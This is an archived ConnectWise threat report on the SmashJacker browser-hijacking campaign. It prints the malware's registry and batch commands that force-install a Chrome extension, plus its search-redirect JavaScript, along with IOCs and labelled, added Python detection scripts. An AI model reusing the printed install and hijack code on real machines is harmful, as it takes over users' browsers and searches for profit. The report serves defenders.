{
	"id": "0ff5f418-a760-48aa-9005-3f4adc55ce92",
	"created_at": "2026-04-06T00:19:52.514822Z",
	"updated_at": "2026-04-10T03:36:47.806846Z",
	"deleted_at": null,
	"sha1_hash": "0ecffb74b1a826a46894980463e774ff1aac2978",
	"title": "SmashJacker | ConnectWise Threat Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 85970,
	"plain_text": "SmashJacker | ConnectWise Threat Report\r\nArchived: 2026-04-05 18:06:54 UTC\r\nExecutive Summary\r\nIn February and March, we noticed a surge in incidents all relating to a few different files that hadn't been\r\nconnected to any type of malware yet. Pivoting off the indicators from these findings, the CRU uncovered a\r\ncampaign spanning back to at least October of 2022 pushing a persistent Chromium extension via software, game,\r\nand movie pirating web pages that we are referring to as SmashJacker. This extension is used to hijack searches\r\nand push users through redirect chains to the domains they're navigating so the actors can receive affiliate\r\nkickbacks for \"directing\" the user to that site, generate ad revenue, and collect analytics on victims.\r\nAnalysis\r\nInitial Access\r\nUsers are lured to download the installer files by having them hosted on pages advertising the download of\r\nwallpapers, software, games, and movies, typically illegally. They are first served the malicious installer, but then\r\ntrying the download again will serve the proper file. It's worth noting that in all the URLs leading to an installer\r\ndownload contain the empty URL parameter 7fk8qechol=. This is a useful indicator and is referenced by the\r\nextension later.\r\nThroughout our analysis, we found mostly InnoSetup and MSI installers being used to deliver this malicious\r\nextension. The MSI installers were all trojanized versions of 7zip that would deliver the extension along with a\r\nlegitimate install of the archiving tool. InnoSetup installers only installed the extension, but masqueraded as either\r\none of the types of files outlined above or were simply named Your File Is Ready To Download.exe. 
Both\r\nversions deliver similar payloads, and in some cases, if no targeted browser is found, nothing is dropped. Most of the samples were signed using a handful of different certificates.\r\nPersistence\r\nSoon after launching, the installer gets to work on persisting. We found two persistence techniques in use, depending on the variant downloaded. Some variants use the AppInit_DLLs registry value to persist by calling the reg command:\r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v \"AppInit_DLLs\" /t REG_SZ /d \"C:\\Users\\[U\r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v \"LoadAppInit_DLLs\" /t REG_DWORD /d 1 /f\r\nThis makes Windows load the dropped dll into every newly created process that loads user32.dll (one caveat for defenders: from Windows 8 on, AppInit_DLLs is ignored when Secure Boot is enabled, so this variant only persists on hosts without it). If the process is one of the targeted browsers, the dll makes sure the extension files exist by unzipping them from an archive embedded in its resources section. Then it creates a batch file for running the proper browser with the malicious extension loaded.\r\nhttps://www.connectwise.com/blog/threat-report/smash-jacker\r\nPage 1 of 13\r\nIn other instances, the installer drops and runs an executable that takes responsibility for its own persistence. When it runs, it creates several files. reg.xml is an XML-formatted scheduled task that runs every 5 minutes and runs the persistence executable that created it; notably, all samples we reviewed had registration and start boundary dates of 2022-11-11. reg.bat is a batch file that simply contains the command to schedule the XML task:\r\nschtasks.exe /Create /XML \"%localappdata%\\{path}\\reg.xml\" /tn {task name}\r\nLastly, another batch file for the targeted browser is created that handles installing the extension. 
An example from one of the samples is included below:\r\n@echo off\r\nset version=1.0\r\nset id=fegdfodkkeaklllcdkpjeakecpfdfmdc\r\nset base32=HKLM\\SOFTWARE\r\nset base64=HKLM\\SOFTWARE\\WOW6432Node\r\nset chrome=Google\\Chrome\r\nset helper=%LocalAppdata%\\WindowsApp\\apps-helper\r\nset file=%helper%\\apps.crx\r\nREG DELETE %base32%\\Policies\\%chrome% /f\r\nREG DELETE %base32%\\%chrome%\\Extensions\\%id% /f\r\nREG DELETE %base64%\\%chrome%\\Extensions\\%id% /f\r\nREG ADD \"%base32%\\Policies\\%chrome%\\ExtensionInstallAllowlist\" /v \"1\" /t REG_SZ /d %id% /f\r\nREG ADD \"%base32%\\%chrome%\\Extensions\\%id%\" /v \"path\" /t REG_SZ /d \"%file%\" /f\r\nREG ADD \"%base32%\\%chrome%\\Extensions\\%id%\" /v \"version\" /t REG_SZ /d %version% /f\r\nREG ADD \"%base64%\\Policies\\%chrome%\\ExtensionInstallAllowlist\" /v \"1\" /t REG_SZ /d %id% /f\r\nREG ADD \"%base64%\\%chrome%\\Extensions\\%id%\" /v \"path\" /t REG_SZ /d \"%file%\" /f\r\nREG ADD \"%base64%\\%chrome%\\Extensions\\%id%\" /v \"version\" /t REG_SZ /d %version% /f\r\ntaskkill /F /IM chrome.exe /T\r\nstart \"\" \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --profile-directory=\"Default\" --no-startup-wind\r\nset chrome_ext0=\"%LocalAppdata%\\%chrome%\\User Data\\Default\\Extensions\\%id%\"\r\nif not exist %chrome_ext0% (timeout 1 \u003e NUL) else (echo \"Wait 1\")\r\nif not exist %chrome_ext0% (timeout 1 \u003e NUL) else (echo \"Wait 2\")\r\n[...]\r\nif not exist %chrome_ext0% (timeout 1 \u003e NUL) else (echo \"Wait 30\")\r\ntimeout 5 \u003e NUL\r\nREG ADD \"%base32%\\Policies\\%chrome%\\ExtensionInstallForcelist\" /v \"1\" /t REG_SZ /d %id% /f\r\nREG ADD \"%base64%\\Policies\\%chrome%\\ExtensionInstallForcelist\" /v \"1\" /t REG_SZ /d %id% /f\r\ntimeout 5 \u003e NUL\r\ntaskkill /F /IM chrome.exe /T\r\nstart \"\" \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --profile-directory=\"Default\"\r\nFirst it adds keys for 
the extension's id in the targeted browser's Extensions and ExtensionInstallAllowlist registry keys, with the path to the extension's .crx file, writing them under both HKLM\\SOFTWARE and its WOW6432Node path. Note that before writing anything the script deletes the entire HKLM\\SOFTWARE\\Policies\\Google\\Chrome key, which wipes any existing Chrome policy on the host. Then it uses taskkill to kill running browsers; some variations try to kill Chrome, Brave, Opera, Vivaldi, and Edge. Then it restarts the targeted browser and passes it a path to a bootstrapping extension through the --load-extension parameter. This is a smaller browser extension with two files, usually called service.js and web.js, whose whole purpose is to ensure the main extension gets loaded into the browser after being set in the registry. service.js adds a listener for installed extensions so that when its own installation triggers, it opens a tab with the chrome://policy page and calls a function in web.js. That function adds a listener for when the chrome://policy page loads and clicks the reload policies button, so the policy registry keys modified earlier are loaded into the browser immediately rather than on its next scheduled policy refresh. Meanwhile, the batch script polls until the extension is installed, then adds its extension id to the browser's ExtensionInstallForcelist registry key, kills the browser, and restarts it without the bootstrapping extension loaded. In the dll versions of the extension there is no .crx file or bootstrapping extension, just what would be the contents of the .crx file.\r\nPost-Install\r\nImmediately after the installation is completed, the targeted browser is opened directly to an actor-controlled page:\r\n\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" https://getfiles[.]wiki/welcome.php\r\nThis is the start of a redirection chain through pages such as https://exturl[.]com/r.php?key=[KEY] or https://offersss[.]click/r.php?payout=OPTIONAL\u0026cnv_id=[ID]. 
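The following Python script is an added example written for this page; it is not code from the report or from ConnectWise. It applies the four CRU detection ideas listed later in the SIEM Detections section (a REG ADD to AppInit_DLLs or LoadAppInit_DLLs, the Your File Is Ready To Download filename, --load-extension on a browser command line, and REG ADD writes to the Chromium Extensions, ExtensionInstallAllowlist or ExtensionInstallForcelist keys), plus the schtasks /Create /XML pattern from the Persistence section, to process-creation command lines, and checks any extension id it finds against the IOC list at the end of the report. The sample events are constructed from the commands quoted above: the victim user name, the full AppInit_DLLs path (truncated in the report), the --load-extension path and the task name are illustrative choices, and the helper names win, norm, triage_command_line and scan are this example's own.

```python
import re

BS = chr(92)   # backslash
Q = chr(34)    # double quote
# Both come from chr() so that no literal in this file needs an escape sequence.

# Extension IDs from the IOC section of this report. A Chromium extension ID is 32 letters from a..p.
IOC_EXTENSION_IDS = {
    'jncffhgjbmpggpdflbbkhdghjipdbjkn', 'macjkjgieeoakdlmmfefgmldohgddpkj',
    'iglfjaeojcakllgbfalclepdncgidelo', 'lehiajjpggngcmnjmbjcdohhfijojgid',
    'febnklnineliajdemdahoiplahfbmffk', 'jmhjnioknjbokpffmnlkdchehoeledda',
    'fegdfodkkeaklllcdkpjeakecpfdfmdc',
}
EXT_ID_RE = re.compile('(?<![a-p])[a-p]{32}(?![a-p])')


def win(path):
    '''Sample-construction helper: write a Windows path with / and get real backslashes back.'''
    return path.replace('/', BS)


def norm(cmdline):
    '''Canonical form for matching: lower-case, quotes dropped, backslashes folded to /, spaces collapsed.'''
    return ' '.join(cmdline.replace(BS, '/').replace(Q, '').lower().split())


def is_reg_add(c):
    return ('reg ' in c or 'reg.exe ' in c) and ' add ' in c


def triage_command_line(cmdline):
    '''Return a list of (rule, detail) hits for one process-creation command line.'''
    c = norm(cmdline)
    hits = []
    if is_reg_add(c) and 'appinit_dlls' in c:
        hits.append(('AppInit DLLs', 'REG ADD to AppInit_DLLs or LoadAppInit_DLLs'))
    if 'your file is ready to download' in c:
        hits.append(('Common Filename for Adware Distribution', 'Your File Is Ready To Download.exe'))
    if '--load-extension' in c:
        hits.append(('Browser Extension Loaded via Command Line', '--load-extension passed to a browser'))
    if is_reg_add(c) and ('/extensions/' in c or 'extensioninstallforcelist' in c
                          or 'extensioninstallallowlist' in c):
        ids = set(EXT_ID_RE.findall(c))
        detail = 'ids=' + ','.join(sorted(ids))
        known = sorted(ids & IOC_EXTENSION_IDS)
        if known:
            detail += ' known_ioc=' + ','.join(known)
        hits.append(('Chromium Extension Install Attempt in Registry via Command Line', detail))
    if 'schtasks' in c and '/create' in c and '/xml' in c and '%localappdata%' in c:
        hits.append(('Scheduled Task Created From XML Under LOCALAPPDATA', 'schtasks /Create /XML'))
    return hits


def rule_names(cmdline):
    return [rule for rule, _ in triage_command_line(cmdline)]


def scan(events):
    '''Map event index to its hits; events without hits map to an empty list.'''
    return {i: triage_command_line(e) for i, e in enumerate(events)}


# Constructed process-creation command lines modelled on the commands quoted in the report.
# The user name, the full AppInit_DLLs path (truncated in the report), the --load-extension
# path and the task name are illustrative.
WINKEY = win('HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Windows')
CHROME = Q + win('C:/Program Files/Google/Chrome/Application/chrome.exe') + Q
SAMPLE_EVENTS = [
    'REG ADD ' + Q + WINKEY + Q + ' /v AppInit_DLLs /t REG_SZ /d '
        + Q + win('C:/Users/victim/AppData/Local/SysWins/ext.dll') + Q + ' /f',
    'REG ADD ' + Q + WINKEY + Q + ' /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f',
    'schtasks.exe /Create /XML ' + Q + win('%localappdata%/ServApps/reg.xml') + Q + ' /tn ChrUpdate',
    'REG ADD ' + Q + win('HKLM/SOFTWARE/Policies/Google/Chrome/ExtensionInstallForcelist') + Q
        + ' /v 1 /t REG_SZ /d fegdfodkkeaklllcdkpjeakecpfdfmdc /f',
    CHROME + ' --profile-directory=Default --load-extension='
        + win('C:/Users/victim/AppData/Local/WindowsApp/googledoc'),
    win('C:/Users/victim/Downloads/Your File Is Ready To Download.exe'),
    CHROME + ' --profile-directory=Default',                    # benign browser start
    'reg query ' + Q + WINKEY + Q,                              # benign read-only query
]

if __name__ == '__main__':
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, hits if hits else 'no hits')
```

The rules key on the normalized command line rather than on the process image so that reg.exe invoked through cmd.exe or a batch file still matches; the two benign events at the end show that an ordinary browser start and a read-only reg query produce no hits.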
These end up redirecting to Google after gathering data about users through trackers such as histats and dtscout.\r\nMalicious Extension\r\nThe extension itself usually consists of three main components that vary between samples. There is the manifest.json file, which is common to all Chromium extensions. Several versions of this file consistently list the author as sg.guru1030@gmail[.]com, and many use the chrome_settings_overrides configuration to change the browser's default search provider to searchesmia[.]com.\r\nThe main logic of the extension lives in one of the remaining two components, sometimes in background.js and other times in content.js. When the main logic is in content.js, it usually just contains a simple search hijacking script that replaces common search engine query URLs with queries to searchesmia[.]com. An example from one of the samples is included below. We observed samples targeting Google, DuckDuckGo, Ecosia, Yahoo, Ask, Neeva, Aol, Webcrawler, Dogpile, Bing, and Info. 
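Before the sample script, here is an added Python example (not code from the report or from ConnectWise) for triaging an extracted extension's manifest.json along the lines this section describes. It recomputes the extension ID from the manifest key field the way Chromium does (SHA-256 over the DER public key, first 32 hex digits mapped 0..f to a..p), checks that ID against the IOC list at the end of the report, flags a chrome_settings_overrides search provider that points at searchesmia[.]com (and marks any other search override for review), matches the sg.guru1030@gmail[.]com author string, and flags the tabs, webNavigation and cookies permissions combined with access to all URLs, which is what an extension needs in order to watch and rewrite navigations. The two manifests are constructed for this example, the key bytes are not a real public key, and the function names mpdecimal, extension_id_from_key, search_provider_host and triage_manifest are this example's own.

```python
import base64
import hashlib
from urllib.parse import urlsplit

# Extension IDs from the IOC section of this report.
IOC_EXTENSION_IDS = {
    'jncffhgjbmpggpdflbbkhdghjipdbjkn', 'macjkjgieeoakdlmmfefgmldohgddpkj',
    'iglfjaeojcakllgbfalclepdncgidelo', 'lehiajjpggngcmnjmbjcdohhfijojgid',
    'febnklnineliajdemdahoiplahfbmffk', 'jmhjnioknjbokpffmnlkdchehoeledda',
    'fegdfodkkeaklllcdkpjeakecpfdfmdc',
}
IOC_AUTHOR = 'sg.guru1030@gmail.com'      # defanged in the report, undefanged here for matching
IOC_SEARCH_HOST = 'searchesmia.com'
NAV_PERMISSIONS = {'tabs', 'webNavigation', 'cookies'}


def mpdecimal(hexdigits):
    '''Chromium ID alphabet: hex digit 0..f becomes letter a..p.'''
    return ''.join(chr(ord('a') + int(h, 16)) for h in hexdigits)


def extension_id_from_key(key_b64):
    '''ID = first 128 bits of SHA-256 over the DER public key carried in the manifest key field.'''
    digest = hashlib.sha256(base64.b64decode(key_b64)).hexdigest()
    return mpdecimal(digest[:32])


def search_provider_host(manifest):
    sp = manifest.get('chrome_settings_overrides', {}).get('search_provider', {})
    url = sp.get('search_url')
    return urlsplit(url).hostname if url else None


def triage_manifest(manifest):
    '''Return (extension_id or None, list of findings) for one parsed manifest.json.'''
    findings = []
    ext_id = extension_id_from_key(manifest['key']) if 'key' in manifest else None
    if ext_id in IOC_EXTENSION_IDS:
        findings.append('extension id ' + ext_id + ' is in the SmashJacker IOC list')
    host = search_provider_host(manifest)
    if host is not None:
        known = host == IOC_SEARCH_HOST or host.endswith('.' + IOC_SEARCH_HOST)
        findings.append('default search provider overridden to ' + host
                        + (' (SmashJacker IOC)' if known else ' (review)'))
    if manifest.get('author') == IOC_AUTHOR:
        findings.append('author matches the SmashJacker manifest author')
    # MV2 lists host patterns under permissions, MV3 under host_permissions; check both.
    perms = set(manifest.get('permissions', [])) | set(manifest.get('host_permissions', []))
    nav = NAV_PERMISSIONS & perms
    if nav and '<all_urls>' in perms:
        findings.append('can watch and rewrite navigation on every site: ' + ', '.join(sorted(nav)))
    return ext_id, findings


# Constructed manifests. The key bytes are not a real public key; any bytes give a valid-looking ID.
SUSPICIOUS_MANIFEST = {
    'manifest_version': 3,
    'name': 'apps-helper',
    'version': '1.0',
    'author': 'sg.guru1030@gmail.com',
    'key': base64.b64encode(b'constructed stand-in for a DER SubjectPublicKeyInfo').decode(),
    'permissions': ['tabs', 'webNavigation', 'cookies', 'storage'],
    'host_permissions': ['<all_urls>'],
    'chrome_settings_overrides': {
        'search_provider': {
            'name': 'Search', 'keyword': 'search', 'encoding': 'UTF-8', 'is_default': True,
            'search_url': 'https://searchesmia.com/bingchr9?q={searchTerms}',
            'favicon_url': 'https://searchesmia.com/favicon.ico',
        }
    },
}
BENIGN_MANIFEST = {
    'manifest_version': 3, 'name': 'Notes', 'version': '2.1',
    'author': 'dev@example.com', 'permissions': ['storage'],
}

if __name__ == '__main__':
    for label, m in (('suspicious', SUSPICIOUS_MANIFEST), ('benign', BENIGN_MANIFEST)):
        ext_id, findings = triage_manifest(m)
        print(label, ext_id, findings if findings else 'no findings')
```

The ID recomputation is what lets an analyst tie an apps.crx or an unpacked extension directory to one of the listed IDs without installing it; a manifest with no key field (as with a path-loaded extension) yields None and the remaining checks still run.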
When content.js is the main script, background.js merely contains a function that writes the string here is background! to the console. In the excerpt below, getQuery (not shown) extracts the search terms from the original URL.\r\nfunction checkUrlIsSearchEngine(url) {\r\n // var hostName = getHost(url)\r\n if (url.match(/^https?:.*?google.*?\\/search?/g) != null) {\r\n var searchQuery = getQuery(url);\r\n location.replace(`https://searchesmia.com/bingchr9?q=${searchQuery}`)\r\n }\r\n if (url.match(/^https?:.*?duckduckgo.*?\\/?q=/g) != null) {\r\n var searchQuery = getQuery(url);\r\n location.replace(`https://searchesmia.com/bingchr9?q=${searchQuery}`)\r\n }\r\n if (url.match(/^https?:.*?ecosia.*?\\/?search?/g) != null) {\r\n var searchQuery = getQuery(url);\r\n location.replace(`https://searchesmia.com/bingchr9?q=${searchQuery}`)\r\n }\r\n if (url.match(/^https?:.*?yahoo.*?\\/?search?/g) != null) {\r\n var searchQuery = getQuery(url, 'yahoo');\r\n location.replace(`https://searchesmia.com/bingchr9?q=${searchQuery}`)\r\n }\r\n}\r\nSearches routed through searchesmia[.]com return a page meant to look like Google search results, but with different ads served on it in an attempt to generate ad revenue for the actors.\r\nThings get a bit more interesting when background.js contains the main logic of the extension. In these cases, we are faced with a lightly obfuscated script with more features than just search hijacking. The search hijacking is still present, but now there are also evasion mechanisms, such as closing tabs that try to navigate to the browser's extensions page (chrome://extensions) or to chrome://settings/reset, to keep the extension from being uninstalled or the browser from being reset.\r\nThe bigger capability we see added is the ability to redirect users from a variety of different pages they may be trying to access through actor infrastructure and back out to the originally intended page with the actor's affiliate parameters tacked onto the URL. 
First, for every tab update it checks whether the URL contains either 7fk8qechol, mentioned earlier as an identifier for all of their initial payload delivery URLs, or the extension's own id. If either is present it closes the tab; otherwise it compares the domain of the page being visited to an extensive list of domains. If there is a match, it redirects the navigation through https://smashaff[.]com/redirect?\u0026url=[DOMAIN], which processes the request differently depending on the domain requested and sends the user back to the intended site with the actor's affiliate parameters attached, so the actor receives affiliate kickbacks. After this, the extension stores a future time for that domain in a cookie, so it won't process that domain again until that time has passed. Usually this is 2 hours, except for an Amazon domain, which is granted a 24-hour waiting period.\r\nPossible Connections\r\nOur initial hypothesis was that this campaign represented a shift in ChromeLoader delivery methods. The usage of pages pushing pirated media to lure victims, file name conventions such as the common Your File Is Ready To Download, and the eventual payload of a search hijacking browser extension hinted in the direction of ChromeLoader. Additionally, we observed historical trends of known ChromeLoader delivery formats, from their first variants delivering AutoHotkey files, to the more popular variant delivered via disc image files. 
When we added on the timeline of incidents related to the installer media, we ended up with a graph that appeared to show a convincing story of shifting trends in ChromeLoader delivery media.\r\n[Figure: Threat Report - SmashJacker Graph.png]\r\nOccasionally we would also find other loose connections, such as a domain and URL patterned similarly to others used by the actors behind this extension redirecting to search hijack pages patterned similarly to those used by ChromeLoader.\r\n[Figure: Threat Report - SmashJacker Image 2.png]\r\nBut the usage of pirated media sites and similar naming conventions isn't unique to ChromeLoader and may just be indicative of a different set of actors that offer their distribution network as a service for many different payloads. The timeline may be tainted by a lack of awareness of other changes in ChromeLoader techniques that may have affected our ability to tag related incidents. And the loose connections we found always remained loose. Additionally, during our search for ChromeLoader samples that were starting to use installers, which is the search that turned up this different malicious extension, we did find a recent msi sample that drops already known ChromeLoader payloads, which only muddied the waters further. It may be the case that the actors behind ChromeLoader also developed this extension and delivery path, but currently we don't have any other data that would warrant higher confidence in this hypothesis.\r\nWe did find other interesting connections though. One word kept recurring in various places during the investigation: Smash. Some installers quickly showed they were installing something called Smash. Many of the domains incorporate the word Smash. In particular there is the smashbrowser[.]com domain that victims are sent to, in some cases, immediately after install. 
Outside of the post-install victim tracking pages, this web site also offers a browser, and search results for it are full of guides on how to remove it as adware.\r\n[Figure: Threat Report - SmashJacker - Smashbrowser.png]\r\nThis was interesting, because during log searches for extension indicators we found another browser called Chromnius matching a large number of the indicators we have seen being used by SmashJacker. Searches for it also mostly turn up results referring to it as adware and suggesting its removal. Spotting the similarities between the two is left to the reader.\r\n[Figure: Threat Report - SmashJacker - Chromnius.png]\r\nFurther, through the domain smashaff[.]com we also connected the malicious extension here to a report by Guardio about a large number of extensions available in the Chrome and Edge stores that are very similar to the variants observed in our research.\r\nThese potential connections suggest a much broader operation with many possible delivery avenues and payloads, and potential connections to ChromeLoader, with the goal of generating revenue via ads and affiliate kickbacks. Adware like this may not typically gain as much attention as other malware whose impact is more immediate, but considering the massive scope of this campaign and the ability to fly under the radar that this lack of concern allows, it's always worth considering the sort of access to data in your organization these actors have, even just through searches and analytics.\r\nSIEM Detections\r\n[CRU][Windows] AppInit DLLs\r\n[CRU][Windows] Common Filename for Adware Distribution (Your File Is Ready To Download)\r\n[CRU][Windows] Browser Extension Loaded via Command Line\r\n[CRU][Windows] Chromium Extension Install Attempt in Registry via Command Line\r\nMITRE ATT\u0026CK Techniques Utilized\r\nT1189 – Drive-by Compromise\r\nT1053.005 – Scheduled Task/Job: Scheduled 
Task\r\nT1204.002 – User Execution: Malicious File\r\nT1546.010 – Event Triggered Execution: AppInit DLLs\r\nT1176 – Browser Extensions\r\nT1565.002 – Data Manipulation: Transmitted Data Manipulation\r\nIOCs\r\nDirectories\r\n%LOCALAPPDATA%\\ServiceApp\r\n%LOCALAPPDATA%\\ServiceApp\\apps-helper\r\n%LOCALAPPDATA%\\WindowsApp\r\n%LOCALAPPDATA%\\WindowsApp\\googledoc\r\n%LOCALAPPDATA%\\WindowsApp\\apps-helper\r\n%LOCALAPPDATA%\\ServApps\r\n%LOCALAPPDATA%\\ServApps\\apps-helper\r\n%LOCALAPPDATA%\\SysWins\r\n%LOCALAPPDATA%\\MicroApp\r\n%LOCALAPPDATA%\\MicroApp\\apps-helper\r\n%LOCALAPPDATA%\\SystemConfigs\r\nDomains\r\nexturl[.]com\r\ngetfiles[.]wiki\r\ngetfiles[.]click\r\noffersss[.]click\r\nsmashbrowser[.]com\r\nofferszzzz[.]click\r\nsearchesmia[.]com\r\nbestsearch[.]ai\r\ndownloads[.]miami\r\ngetyourfile[.]cloud\r\ndownloadit[.]wiki\r\nsmashaff[.]com\r\nchangec olorss[.]com\r\ncampaignfreekek[.]monster\r\ncampaignfreekek[.]buzz\r\ncampaignkeepy[.]buzz\r\nfileskeepdownload[.]lol\r\ncampaignloader[.]buzz\r\ncampaignkeepy[.]monster\r\ncampaignlyfilez[.]lol\r\ncampaignindown[.]buzz\r\ncampaignindown[.]lol\r\ncampaignloede[.]buzz\r\ncampaignloede[.]monster\r\ncampaigndowna[.]skin\r\ncampaigndowna[.]monster\r\ncampaigndowna[.]pics\r\ncampaignleka[.]skin\r\ndownloadkeppy[.]lol\r\ndownloadkeppy[.]buzz\r\nfiledownloader[.]cloud\r\ndownloadwikiki[.]lol\r\ndownloaderfiles[.]wiki\r\nfreefilesdownloads[.]wiki\r\nfilesdownloader[.]one\r\npyrd5[.]xyz\r\nExtension IDs\r\njncffhgjbmpggpdflbbkhdghjipdbjkn\r\nmacjkjgieeoakdlmmfefgmldohgddpkj\r\niglfjaeojcakllgbfalclepdncgidelo\r\nlehiajjpggngcmnjmbjcdohhfijojgid\r\nfebnklnineliajdemdahoiplahfbmffk\r\njmhjnioknjbokpffmnlkdchehoeledda\r\nfegdfodkkeaklllcdkpjeakecpfdfmdc\r\nRegistry Keys\r\nHKLM\\SOFTWARE\\Microsoft\\Windows 
NT\\CurrentVersion\\Windows\\AppInit_DLLs\r\nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs\r\nHKLM\\SOFTWARE\\Google\\Chrome\\Extensions\r\nHKLM\\SOFTWARE\\Microsoft\\Edge\\Extensions\r\nHKLM\\SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallAllowlist\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Edge\\ExtensionInstallAllowlist\r\nHKLM\\SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallForcelist\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Edge\\ExtensionInstallForcelist\r\nHKLM\\SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\r\nHKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Edge\\Extensions\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Google\\Chrome\\ExtensionInstallForcelist\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\Edge\\ExtensionInstallForcelist\r\nScheduled Task Names\r\nChromeUpdatess\r\nChrUpdate\r\nGoogleUpdate\r\nFile Signing Certificates\r\nLIMESTONE DIGITAL LIMITED\r\n2aae66915908a703d5059da2fcf4d5245b78bb30\r\nFTechnology Limited\r\n8ef055874b2f22f2653a7fd0f7244ef26f48ee5d\r\nTEKVIVE LTD\r\n48688c5a67c8abcaabb12024e9bbd4b5c2599991\r\nTELIX LIMITED\r\nf7ead36c07f11fe932e6baca357f2610c550cee3\r\nTECKHA LTD\r\n55d44799c5f51d3b08e957f89b930f014ce54945\r\nSOFTWARE ABFG LTD\r\nee81e7d510b97695351ef3f2e0c10f4d0601eda6\r\nInnoSetup Hashes\r\n3a3532fed3673bfb65fd8271ebf0c029cffddb76f4d6b0315cb47cf46eabc31d\r\nae2250acbdd6bd9cda9259ecd1a211e8a22d4122de3687c4cd31321673bbf875\r\nfe5fa373eb6232059a47076fe1315d3499480da8b7e357bd8fc08caa05b03af1\r\n26bec2d9c0843b1a583e7f17d810d92c750a909c48b5565e2fa0a8920356f457\r\n1857ae53c297c522361108dab313e9f83ec7802af37edaffdcd1002b6e4cb54c\r\nf8f27ae04481c96fdc875300dee32d19017a888d730e1f1586163be2a6a55176\r\n1d180bd0d9a05b4c3883b99fcf9b5502bf30b35b2e09d4ba4ab2111079b3221e\r\ncafbf35c0d9cf556d2c92086e0145ed092959eb725d6a8134adb9df835ad4a9d\r\nc851a6b21ec14b6964c107a2bfaeb8db1b22ab4e967c881f4e6e76877c452761\r\n093d15f885cc4a9993a2425c6dff5f86d421056642473074746927eecce43fe7\r\n3494f9352c5bd48f55caddbbb63515f8058763e28f8e5f8fa5411a5de835ca8e\r\n87c79d29737dca30e36aac1c90ac3eab82f71393b815a9d7c086565e257fd434\r\nea6443416c31bb5f5d8476357619c3c9b80d3959742b8f3080b56ce8c24b9429\r\n147e1b5a750fbfd8863449d523e3d6d110defceb74ad9cdb7c939ab75ffa2180\r\n20e1aabfaad727ba939133691a7c0ab34401f1c973e2611d8585ef1699670dff\r\n1e7058ee1fbec5524de39dadf1cadc6557b53a5e764296155ecb63adb1a8721a\r\nb1256289d4aaada74a40b6ca52aa0d382b7660943ea31744486007653ee925ad\r\n2df3f0c50942cebf7d508364ade31de19a84a6d9377a7799b626abdf8f09a9bb\r\n783c4c0ee5b6202ecb437c9c6b277376344f4784b672db9115551559322834a4\r\nfa8b150a06d2ccee4aee81ee84fda0e1269b8aed5efdb0f3c22f2d0b154e470a\r\nc8e02aa1de118d17878ca909f266fd9b97957d911e20659ab355a5e868fd4d3c\r\n8ac240ad76b8af9f85a1aea9cac3a993b8be99b342de8827621f1ad9c0209404\r\na837c3ad6bf70e148282b1d4964fc63ab5e75f6fa7596205db50cb9db76e8b29\r\n.msi Hashes\r\n017388719abfb911787abd2fa1b6b12a806660761b8ae4efe12196efc447e8d2\r\nac3312c712ff50e93d62a1696e3997fdf7d9a9eb01c589d26ac6c3189e50dfc8\r\naf11fc54dc1633b963304f22ac014a7af86c8ab904b29de2141fa63bf75fb488\r\nb063cb2736356fba41055ea2cc4d69a3108b7028de97c96420dd206788ea85a5\r\nc8a606a63da9206a1a308fa8696c8cbfa42510970d1888aeb7e605c94b98a8ec\r\n192ab51d793a4a1ab84d69146566d203168df26b64b3886813262113f4e21951\r\n384dcaac36183b76183e4e1f0decf3b035f97c353d6c9846dc04249e95e22587\r\n4f55de6fa77a36b9e5ec04fb6222f26f4e757dbc492c22af4f907f7ae3ace3a1\r\n7fc333a6e310cfe08b2b12649d3bc502eb355819d60937ceb4b54d0b85019aba\r\n87e6fb021b834187f819c2718f5119ffc07fc941fe17eb436ed8533a4867c475\r\n936416f151886041c3f0e50ec57a101ee008c18126f2523ca3335dad07f1c112\r\nDropped File Hashes\r\nInstallExtension.exe/App.exe/EdgeInstall.exe/ChromeInstall.exe\r\n3d4fc14fccb7e4adb4854f6da66bbb7b829e354a2f88b998d6f3ba9fbb8f141d\r\n5ee53990ddd5924f27744a565e06c12667018210dfc18e444b8f468402a86023\r\n1eb53fb5dd3f2437eb50fe1668f2d1edc9f3209a7f21f33192117afdf7e38208\r\n920f528cdf720187b49ee99274a5bf75ad392c9ae7eeecca803ec049aea2bd36\r\na9d5c1acfe3af5f3ac2c4d7caf04da163b21a6f835ea0dfaf36a38b058e7f43e\r\next.dll/sxsshell.dll/sxsext.dll\r\ne788ffef53cedbcc81fa19933a0940a5d5110a8f2abff32d0fd6050f113be4d9\r\n0d12cc1590d4ef968d6fcfbbd865a9f41ab0e85f7ca820de87ed8672e972c6cc\r\n7387f56531b5e46e0f3ffa5a9cfc888bc46be8f9d5d44267f4649daeb5c9519e\r\n5e53711bec7270509b71db47ac5c72a6249d8b724d32b0e7c836648d304887c6\r\nchrome.bat/edge.bat/install.bat\r\n99f181734dd78a4b37eeb502bc34cb332151cf486ddca19f6c64f1a6755d7ef1\r\n56321f7b7764686960f7c51ace571217bcec1d6613884b1003296406a55ddf90\r\n448641c0707a0beb2fdb2b2195a8aa3965a3ca27ddf745160c3caad38a21401a\r\n1e90cf8498a2684dcd09b6b12784f1c6bada64c1148779286f0c734b5df3c245\r\n9b8c45da4e4f713d57ba1377fb3f66537b3de3761aa2c9ae8ecf66a4495e63d4\r\ne488d824f6d39b999a9e15719933a6afdabe7f45a482aac5626fe2d91bf43ae2\r\n7487a70f1e368a216b5b99d2683469d9ac79352e